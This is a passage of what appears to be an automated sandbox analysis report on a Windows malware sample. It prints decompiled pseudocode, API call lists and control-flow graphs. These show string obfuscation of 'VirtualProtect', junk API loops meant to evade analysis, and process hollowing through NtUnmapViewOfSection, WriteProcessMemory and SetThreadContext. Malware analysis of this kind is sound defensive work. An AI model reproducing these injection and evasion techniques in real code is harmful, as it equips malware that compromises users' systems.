                  						E00405355(_t112); // executed
                  					}
                  					_t122 = _t122 + 1;
                  				} while (_t122 < 0x3debc7);
                  				_t57 = E004051A8( *0x5838fc,  *0x588f80, 0x420010);
                  				_t123 = 0;
                  				do {
                  					if( *0x588f80 == 0x10) {
                  						InterlockedIncrement( &_v12);
                  						_t57 = GetCharWidthA(0, 0, 0, 0);
                  					}
                  					if(_t123 == 0x1e674) {
                  						_t57 = E00405347(_t57);
                  					}
                  					_t123 = _t123 + 1;
                  				} while (_t123 < 0x3e4e2);
                  				_t124 = 0xdd7b3;
                  				do {
                  					if( *0x588f80 == 0x21) {
                  						SetThreadToken(0, 0);
                  					}
                  					_t124 = _t124 - 1;
                  				} while (_t124 != 0);
                  				E00404F21();
                  				_t125 = __imp__MoveFileWithProgressA;
                  				if( *0x588f80 == 0x1144) {
                  					__imp__FindNextVolumeA(0, 0, 0);
                  					GetModuleHandleA("Lef tibiwuhafibir");
                  					__imp__CreateActCtxW( &_v124);
                  					VerifyVersionInfoA( &_v288, 0, 0);
                  					InterlockedDecrement(0);
                  					InterlockedIncrement(0);
                  					 *_t125(0, 0, 0, 0, 0, 0);
                  				}
                  				if( *0x588f80 == 0x1d) {
                  					WriteConsoleW(0, 0, 0,  &_v12, 0);
                  					GlobalFindAtomW(L"jijozumadik");
                  					LoadLibraryW(0);
                  					 *_t125(0, 0, 0, 0, 0);
                  					SetProcessAffinityMask(0, 0);
                  					GetACP();
                  					DefineDosDeviceW(0, 0, 0);
                  					GetDiskFreeSpaceExW(0,  &_v60,  &_v68,  &_v44);
                  					InterlockedExchange( &_v16, 0);
                  					GetPrivateProfileStructW(0, 0,  &_v1312, 0, 0);
                  					LockFile(0, 0, 0, 0, 0);
                  					_lread(0, 0, 0);
                  					ReadConsoleInputW(0,  &_v88, 0,  &_v20);
                  					GetPrivateProfileIntA(0, 0, 0, 0);
                  					__imp__OpenJobObjectW(0, 0, L"Lipafi goleheriziv");
                  					GetTapeParameters(0, 0,  &_v8, 0);
                  					GetMailslotInfo(0, 0, 0, 0, 0);
                  					CopyFileW(0, 0, 0);
                  					__imp__GetSystemWindowsDirectoryA( &_v2336, 0);
                  					OpenFileMappingA(0, 0, 0);
                  					__imp__GetConsoleAliasesLengthA(0);
                  					SetFileTime(0,  &_v36,  &_v52,  &_v28);
                  				}
                  				L00405341();
                  				return 0;
                  				L6:
                  				_t117 = _t117 + 1;
                  				if(_t117 < 0x91be26a3) {
                  					goto L1;
                  				}
                  				goto L7;
                  			}

































                  0x00405467
                  0x00405474
                  0x00000000
                  0x00405476
                  0x0040547c
                  0x0040547f
                  0x00405485
                  0x00405485
                  0x00405491
                  0x00000000
                  0x00000000
                  0x004054ae
                  0x004054ae
                  0x004054b0
                  0x004054b6
                  0x004054bd
                  0x004054bd
                  0x004054ca
                  0x004054d1
                  0x004054d1
                  0x004054d7
                  0x004054d8
                  0x004054e0
                  0x004054e5
                  0x004054ed
                  0x004054ef
                  0x004054f0
                  0x004054fc
                  0x004054fe
                  0x0040551d
                  0x00405524
                  0x00405524
                  0x0040552a
                  0x0040552b
                  0x004054ef
                  0x0040553a
                  0x0040553f
                  0x00405549
                  0x0040554b
                  0x00405555
                  0x00405560
                  0x00405571
                  0x0040557b
                  0x00405580
                  0x0040558a
                  0x00405591
                  0x00405598
                  0x004055a9
                  0x004055b3
                  0x004055b3
                  0x004055b5
                  0x004055b5
                  0x004055be
                  0x004055c1
                  0x004055c6
                  0x004055cd
                  0x004055d0
                  0x004055d0
                  0x004055d9
                  0x004055de
                  0x004055de
                  0x004055e3
                  0x004055e6
                  0x004055f6
                  0x00405602
                  0x00405607
                  0x00405609
                  0x0040560c
                  0x0040560e
                  0x0040560e
                  0x00405613
                  0x00405614
                  0x0040562d
                  0x00405632
                  0x00405634
                  0x0040563b
                  0x00405641
                  0x0040564b
                  0x0040564b
                  0x00405657
                  0x00405659
                  0x00405659
                  0x0040565e
                  0x0040565f
                  0x00405667
                  0x0040566c
                  0x00405673
                  0x00405677
                  0x00405677
                  0x0040567d
                  0x0040567d
                  0x00405680
                  0x0040568f
                  0x00405695
                  0x0040569a
                  0x004056a5
                  0x004056ab
                  0x004056bb
                  0x004056c2
                  0x004056c9
                  0x004056d4
                  0x004056d4
                  0x004056de
                  0x004056ec
                  0x004056f7
                  0x004056fe
                  0x00405709
                  0x0040570d
                  0x00405713
                  0x0040571c
                  0x0040572f
                  0x0040573a
                  0x0040574b
                  0x00405756
                  0x0040575f
                  0x0040576f
                  0x00405779
                  0x00405786
                  0x00405793
                  0x0040579e
                  0x004057a7
                  0x004057b5
                  0x004057be
                  0x004057c5
                  0x004057d8
                  0x004057d8
                  0x004057de
                  0x004057e8
                  0x004054a5
                  0x004054a5
                  0x004054ac
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • SetLastError.KERNEL32(00000000), ref: 0040547F
                  • GetTickCount.KERNEL32 ref: 00405485
                  • LoadLibraryA.KERNEL32(Cixofarifozehuv rilivavihe rofa juyunevame), ref: 004054D1
                  • AreFileApisANSI.KERNEL32 ref: 004054FE
                  • GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040551D
                  • InterlockedIncrement.KERNEL32(00000000), ref: 00405524
                  • GetConsoleAliasExesLengthW.KERNEL32 ref: 0040554B
                  • EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405555
                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00405560
                  • GetPrivateProfileStructA.KERNEL32 ref: 00405571
                  • EnterCriticalSection.KERNEL32(?), ref: 0040557B
                  • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 00405580
                  • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040558A
                  • LocalUnlock.KERNEL32(00000000), ref: 00405591
                  • CancelDeviceWakeupRequest.KERNEL32(00000000), ref: 00405598
                  • GetComputerNameW.KERNEL32 ref: 004055A9
                  • EnterCriticalSection.KERNEL32(?), ref: 004055B3
                  • GetModuleHandleA.KERNEL32(00000000), ref: 004055D0
                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004055DC
                  • GetProcAddress.KERNEL32(VirtualProtect), ref: 004055FC
                  • InterlockedIncrement.KERNEL32(?), ref: 00405641
                  • GetCharWidthA.GDI32(00000000,00000000,00000000,00000000), ref: 0040564B
                  • SetThreadToken.ADVAPI32(00000000,00000000), ref: 00405677
                  • FindNextVolumeA.KERNEL32(00000000,00000000,00000000), ref: 0040569A
                  • GetModuleHandleA.KERNEL32(Lef tibiwuhafibir), ref: 004056A5
                  • CreateActCtxW.KERNEL32(?), ref: 004056AB
                  • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 004056BB
                  • InterlockedDecrement.KERNEL32(00000000), ref: 004056C2
                  • InterlockedIncrement.KERNEL32(00000000), ref: 004056C9
                  • MoveFileWithProgressA.KERNEL32 ref: 004056D4
                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004056EC
                  • GlobalFindAtomW.KERNEL32(jijozumadik), ref: 004056F7
                  • LoadLibraryW.KERNEL32(00000000), ref: 004056FE
                  • MoveFileWithProgressA.KERNEL32 ref: 00405709
                  • SetProcessAffinityMask.KERNEL32(00000000,00000000), ref: 0040570D
                  • GetACP.KERNEL32 ref: 00405713
                  • DefineDosDeviceW.KERNEL32(00000000,00000000,00000000), ref: 0040571C
                  • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,?), ref: 0040572F
                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040573A
                  • GetPrivateProfileStructW.KERNEL32 ref: 0040574B
                  • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405756
                  • _lread.KERNEL32(00000000,00000000,00000000), ref: 0040575F
                  • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 0040576F
                  • GetPrivateProfileIntA.KERNEL32 ref: 00405779
                  • OpenJobObjectW.KERNEL32 ref: 00405786
                  • GetTapeParameters.KERNEL32 ref: 00405793
                  • GetMailslotInfo.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040579E
                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 004057A7
                  • GetSystemWindowsDirectoryA.KERNEL32 ref: 004057B5
                  • OpenFileMappingA.KERNEL32 ref: 004057BE
                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004057C5
                  • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004057D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: FileInterlocked$ConsoleHandleInfo$ExchangeIncrementModulePrivateProfile$CalendarCriticalDeviceEnterEnumFindLengthLibraryLoadMoveOpenProgressSectionStructWith$AddressAffinityAliasAliasesApisAtomCancelCharCompareComputerCopyCountCreateDecrementDefineDirectoryDiskErrorExesFreeGlobalInputLastLocalLockMailslotMappingMaskNameNamedNextObjectParametersPipeProcProcessReadRequestSpaceStateSystemTapeThreadTickTimeTokenUnlockVerifyVersionVolumeWakeupWidthWindowsWrite_lread
                  • String ID: Cixofarifozehuv rilivavihe rofa juyunevame$Lef tibiwuhafibir$Lipafi goleheriziv$VirtualProtect$jijozumadik
                  • API String ID: 1457462388-3514249173
                  • Opcode ID: 2b5aae3e83c8315b457200b043a2e3f9ceb9a4104daecfdbefeb14b609271f16
                  • Instruction ID: 08019152a2c2f253fc8e3e2ec4ae27ce5eadfc123fbb47b72d69aa9636cf313a
                  • Opcode Fuzzy Hash: 2b5aae3e83c8315b457200b043a2e3f9ceb9a4104daecfdbefeb14b609271f16
                  • Instruction Fuzzy Hash: 89911BB2800558BFDB11ABA0EE88DEF777CEB18345B405436F646F2461DA389D849F78
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021B0156
                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 021B016C
                  • CreateProcessA.KERNELBASE(?,00000000), ref: 021B0255
                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021B0270
                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021B0283
                  • GetThreadContext.KERNELBASE(00000000,?), ref: 021B029F
                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021B02C8
                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021B02E3
                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021B0304
                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021B032A
                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021B0399
                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021B03BF
                  • SetThreadContext.KERNELBASE(00000000,?), ref: 021B03E1
                  • ResumeThread.KERNELBASE(00000000), ref: 021B03ED
                  • ExitProcess.KERNEL32(00000000), ref: 021B0412
                  Memory Dump Source
                  • Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                  • String ID:
                  • API String ID: 2875986403-0
                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                  • Instruction ID: 81fe16addc6e27c39443063ed43a1d853767ada4b3a18cf17f909fab6d8313ea
                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                  • Instruction Fuzzy Hash: 07B1B574A00208AFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE45CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 73 21b0420-21b04f8 75 21b04fa 73->75 76 21b04ff-21b053c CreateWindowExA 73->76 77 21b05aa-21b05ad 75->77 78 21b053e 76->78 79 21b0540-21b0558 PostMessageA 76->79 78->77 80 21b055f-21b0563 79->80 80->77 81 21b0565-21b0579 80->81 81->77 83 21b057b-21b0582 81->83 84 21b05a8 83->84 85 21b0584-21b0588 83->85 84->80 85->84 86 21b058a-21b0591 85->86 86->84 87 21b0593-21b0597 call 21b0110 86->87 89 21b059c-21b05a5 87->89 89->84
                  APIs
                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021B0533
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: CreateWindow
                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                  • API String ID: 716092398-2341455598
                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                  • Instruction ID: 5ffb71b6f1df3e0508b6f68498e6426d50df0c53609cf72b2818bd8d06812f48
                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                  • Instruction Fuzzy Hash: EA512B70D48388DEEB11CBD8C849BDEBFB66F15708F144058D5447F286C3BA5658CB66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 60%
                  			E004057E9() {
                  				char _v28;
                  				char _v164;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				void* _t23;
                  				void* _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = 0;
                  				_t34 =  *0x588f80 - 3;
                  				if( *0x588f80 == 3) {
                  					E00409328(0, 0, 0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					E004091E5(_t23, _t28, _t29, 0, _t34);
                  					E004091B5(0);
                  					_push(0);
                  					_push(0);
                  					E004090A9(_t23, _t28, _t29, 0, _t34);
                  					E00409076(0, 0);
                  					E004074F1( &_v28, _t34);
                  					_push(1);
                  					_push(3);
                  					E004076B8( &_v164);
                  					E00408F5F(_t23, _t28, _t29, 0);
                  					E00408F48(_t34, 0);
                  					_push(0);
                  					E00408E16();
                  					_push(0);
                  					E004089EA(_t23, _t29, 0, _t34);
                  					_push(0);
                  					_push(0);
                  					E00408BE5(_t23, _t29, 0, _t34);
                  					E00406B71( &_v164);
                  					_t24 =  &_v28;
                  					E00407633( &_v28, 0, _t34);
                  				}
                  				_t5 =  *0x420dd4; // 0xba8a
                  				 *0x588f80 = _t5;
                  				do {
                  					if(_t30 == 0x1737) {
                  						_t6 =  *0x420008; // 0x41d50a
                  						 *0x588f84 = _t6;
                  					}
                  					_t30 = _t30 + 1;
                  				} while (_t30 < 0x79a863);
                  				E00405467(_t24); // executed
                  				return 0;
                  			}













                  0x004057f3
                  0x004057f5
                  0x004057fc
                  0x00405801
                  0x00405806
                  0x00405807
                  0x00405808
                  0x00405809
                  0x0040580f
                  0x00405814
                  0x00405815
                  0x00405816
                  0x0040581d
                  0x00405828
                  0x0040582d
                  0x0040582f
                  0x00405837
                  0x0040583c
                  0x00405842
                  0x00405847
                  0x00405848
                  0x0040584d
                  0x0040584e
                  0x00405853
                  0x00405854
                  0x00405855
                  0x00405863
                  0x00405868
                  0x0040586b
                  0x0040586b
                  0x00405870
                  0x00405875
                  0x0040587a
                  0x00405880
                  0x00405882
                  0x00405887
                  0x00405887
                  0x0040588c
                  0x0040588d
                  0x00405895
                  0x0040589e

                  APIs
                  • __vswprintf.LIBCMT ref: 00405801
                    • Part of subcall function 00409328: __vsprintf_l.LIBCMT ref: 00409338
                  • _printf.LIBCMT ref: 00405809
                    • Part of subcall function 004091B5: DeleteFileA.KERNEL32(00000000,?,00405814,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091BD
                    • Part of subcall function 004091B5: GetLastError.KERNEL32(?,00405814,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091C7
                    • Part of subcall function 004091B5: __dosmaperr.LIBCMT ref: 004091D6
                  • _fputc.LIBCMT ref: 00405816
                    • Part of subcall function 00409076: MoveFileA.KERNEL32 ref: 00409081
                    • Part of subcall function 00409076: GetLastError.KERNEL32(?,00405822,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040908B
                    • Part of subcall function 00409076: __dosmaperr.LIBCMT ref: 0040909A
                    • Part of subcall function 004074F1: __EH_prolog.LIBCMT ref: 004074F6
                    • Part of subcall function 004076B8: __EH_prolog.LIBCMT ref: 004076BD
                  • _abort.LIBCMT ref: 0040583C
                    • Part of subcall function 00408F5F: __NMSG_WRITE.LIBCMT ref: 00408F80
                    • Part of subcall function 00408F5F: _raise.LIBCMT ref: 00408F91
                    • Part of subcall function 00408F5F: _memset.LIBCMT ref: 00409029
                    • Part of subcall function 00408F5F: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0040905B
                    • Part of subcall function 00408F5F: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00409068
                    • Part of subcall function 004089EA: __lock.LIBCMT ref: 00408A08
                    • Part of subcall function 004089EA: ___sbh_find_block.LIBCMT ref: 00408A13
                    • Part of subcall function 004089EA: ___sbh_free_block.LIBCMT ref: 00408A22
                    • Part of subcall function 004089EA: HeapFree.KERNEL32(00000000,?,0041E230,0000000C,0040E420,00000000,0041E560,0000000C,0040E45A,?,?,?,00412359,00000004,0041E640,0000000C), ref: 00408A52
                    • Part of subcall function 004089EA: GetLastError.KERNEL32(?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001,00000214), ref: 00408A63
                  • _realloc.LIBCMT ref: 00405855
                    • Part of subcall function 00408BE5: _malloc.LIBCMT ref: 00408BFB
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ErrorLast$ExceptionFileFilterH_prologUnhandled__dosmaperr$DeleteFreeHeapMove___sbh_find_block___sbh_free_block__lock__vsprintf_l__vswprintf_abort_fputc_malloc_memset_printf_raise_realloc
                  • String ID:
                  • API String ID: 3215118070-0
                  • Opcode ID: a6ace16ddf9c902af84ec2c54a869bd85f3f4a02d5f5cf95cd6e241be85c6084
                  • Instruction ID: a1f2a4fb0a9e460dc3af8596b9f07d2cbfde25b125f958ccfb3a22daf894e4ec
                  • Opcode Fuzzy Hash: a6ace16ddf9c902af84ec2c54a869bd85f3f4a02d5f5cf95cd6e241be85c6084
                  • Instruction Fuzzy Hash: 15015E3190293466C625B7378C47EDF7A68DF12358F80003EF849721D29E3C1A468AEE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 126 405353-405452 GetModuleHandleA GetProcAddress VirtualProtect
                  C-Code - Quality: 100%
                  			E00405353(void* __eax, void* __ecx) {
                  				long _v8;
                  				struct HINSTANCE__* _t4;
                  				int _t6;
                  				CHAR* _t10;
                  
                  				_t10 = "VirtualProtect";
                  				"lProtect" = 0x33;
                  				"Protect" = 0x32;
                  				 *0x431ad3 = 0x6c;
                  				M00431ACB = 0x6e;
                  				"VirtualProtect" = 0x6b;
                  				M00431ACC = 0x65;
                  				M00431ACD = 0x6c;
                  				M00431AC9 = 0x65;
                  				M00431ACA = 0x72;
                  				"rotect" = 0x2e;
                  				 *0x431ad1 = 0x64;
                  				 *0x431ad2 = 0x6c;
                  				 *0x431ad4 = 0;
                  				_t4 = GetModuleHandleA(_t10);
                  				 *0x5873fc = _t4;
                  				 *0x431ad3 = 0x65;
                  				M00431AC9 = 0x69;
                  				M00431ACC = 0x75;
                  				"lProtect" = 0x6c;
                  				M00431ACD = 0x61;
                  				 *0x431ad1 = 0x6f;
                  				 *0x431ad5 = 0x74;
                  				"VirtualProtect" = 0x56;
                  				 *0x431ad4 = 0x63;
                  				"Protect" = 0x50;
                  				 *0x431ad6 = 0;
                  				M00431ACB = 0x74;
                  				 *0x431ad2 = 0x74;
                  				M00431ACA = 0x72;
                  				"rotect" = 0x72;
                  				 *0x431ac4 = GetProcAddress(_t4, _t10);
                  				_t6 = VirtualProtect( *0x5838fc,  *0x588f80, 0x40,  &_v8); // executed
                  				return _t6;
                  			}







                  0x0040535a
                  0x00405360
                  0x00405367
                  0x0040536e
                  0x00405375
                  0x0040537c
                  0x00405383
                  0x0040538a
                  0x00405391
                  0x00405398
                  0x0040539f
                  0x004053a6
                  0x004053ad
                  0x004053b4
                  0x004053bb
                  0x004053c3
                  0x004053c8
                  0x004053cf
                  0x004053d6
                  0x004053dd
                  0x004053e4
                  0x004053eb
                  0x004053f2
                  0x004053f9
                  0x00405400
                  0x00405407
                  0x0040540e
                  0x00405415
                  0x0040541c
                  0x00405423
                  0x0040542a
                  0x00405443
                  0x0040544e
                  0x00405452

                  APIs
                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004053BB
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00405431
                  • VirtualProtect.KERNELBASE(00000040,?), ref: 0040544E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID: VirtualProtect
                  • API String ID: 2099061454-268857135
                  • Opcode ID: 03a2b06d3c5407b6fa9ae1ba496f00dc7ad6cd7f5605da8864e3c21e7c9833ad
                  • Instruction ID: 77afcab1837504b6b7a9f7825e90ade39315f7ed8bb655931f8ce39dea576d4f
                  • Opcode Fuzzy Hash: 03a2b06d3c5407b6fa9ae1ba496f00dc7ad6cd7f5605da8864e3c21e7c9833ad
                  • Instruction Fuzzy Hash: 0B21C62040E6C0DDE302E729AC187513FD6A76274AF0C20A9D184DAAF2D3FB1168C77E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 128 405355-405452 GetModuleHandleA GetProcAddress VirtualProtect
                  C-Code - Quality: 100%
                  			E00405355(void* __ecx) {
                  				long _v8;
                  				struct HINSTANCE__* _t2;
                  				int _t4;
                  				CHAR* _t8;
                  
                  				_t8 = "VirtualProtect";
                  				"lProtect" = 0x33;
                  				"Protect" = 0x32;
                  				 *0x431ad3 = 0x6c;
                  				M00431ACB = 0x6e;
                  				"VirtualProtect" = 0x6b;
                  				M00431ACC = 0x65;
                  				M00431ACD = 0x6c;
                  				M00431AC9 = 0x65;
                  				M00431ACA = 0x72;
                  				"rotect" = 0x2e;
                  				 *0x431ad1 = 0x64;
                  				 *0x431ad2 = 0x6c;
                  				 *0x431ad4 = 0;
                  				_t2 = GetModuleHandleA(_t8);
                  				 *0x5873fc = _t2;
                  				 *0x431ad3 = 0x65;
                  				M00431AC9 = 0x69;
                  				M00431ACC = 0x75;
                  				"lProtect" = 0x6c;
                  				M00431ACD = 0x61;
                  				 *0x431ad1 = 0x6f;
                  				 *0x431ad5 = 0x74;
                  				"VirtualProtect" = 0x56;
                  				 *0x431ad4 = 0x63;
                  				"Protect" = 0x50;
                  				 *0x431ad6 = 0;
                  				M00431ACB = 0x74;
                  				 *0x431ad2 = 0x74;
                  				M00431ACA = 0x72;
                  				"rotect" = 0x72;
                  				 *0x431ac4 = GetProcAddress(_t2, _t8);
                  				_t4 = VirtualProtect( *0x5838fc,  *0x588f80, 0x40,  &_v8); // executed
                  				return _t4;
                  			}







                  0x0040535a
                  0x00405360
                  0x00405367
                  0x0040536e
                  0x00405375
                  0x0040537c
                  0x00405383
                  0x0040538a
                  0x00405391
                  0x00405398
                  0x0040539f
                  0x004053a6
                  0x004053ad
                  0x004053b4
                  0x004053bb
                  0x004053c3
                  0x004053c8
                  0x004053cf
                  0x004053d6
                  0x004053dd
                  0x004053e4
                  0x004053eb
                  0x004053f2
                  0x004053f9
                  0x00405400
                  0x00405407
                  0x0040540e
                  0x00405415
                  0x0040541c
                  0x00405423
                  0x0040542a
                  0x00405443
                  0x0040544e
                  0x00405452

                  APIs
                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004053BB
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00405431
                  • VirtualProtect.KERNELBASE(00000040,?), ref: 0040544E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID: VirtualProtect
                  • API String ID: 2099061454-268857135
                  • Opcode ID: d0d815820f698ffe7fcbcdce8aed8f89374a43fe3a38154b444991f99cca84fd
                  • Instruction ID: d351fd4be09a0e36ebd033f31072c1fa880a8a4c200c79683c9707f30f8d9d36
                  • Opcode Fuzzy Hash: d0d815820f698ffe7fcbcdce8aed8f89374a43fe3a38154b444991f99cca84fd
                  • Instruction Fuzzy Hash: 9121C61040E6C0DDE302E729AC187513ED6A76274AF0C20A9D184DAAF2D3FB1168C77E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 129 21b05b0-21b05d5 130 21b05dc-21b05e0 129->130 131 21b061e-21b0621 130->131 132 21b05e2-21b05f5 GetFileAttributesA 130->132 133 21b0613-21b061c 132->133 134 21b05f7-21b05fe 132->134 133->130 134->133 135 21b0600-21b060b call 21b0420 134->135 137 21b0610 135->137 137->133
                  APIs
                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 021B05EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID: apfHQ$o
                  • API String ID: 3188754299-2999369273
                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                  • Instruction ID: ae06fc259df5a8143a9be403b7415ab1dc3c8ba716a2aecac0af8d26ab44ac0e
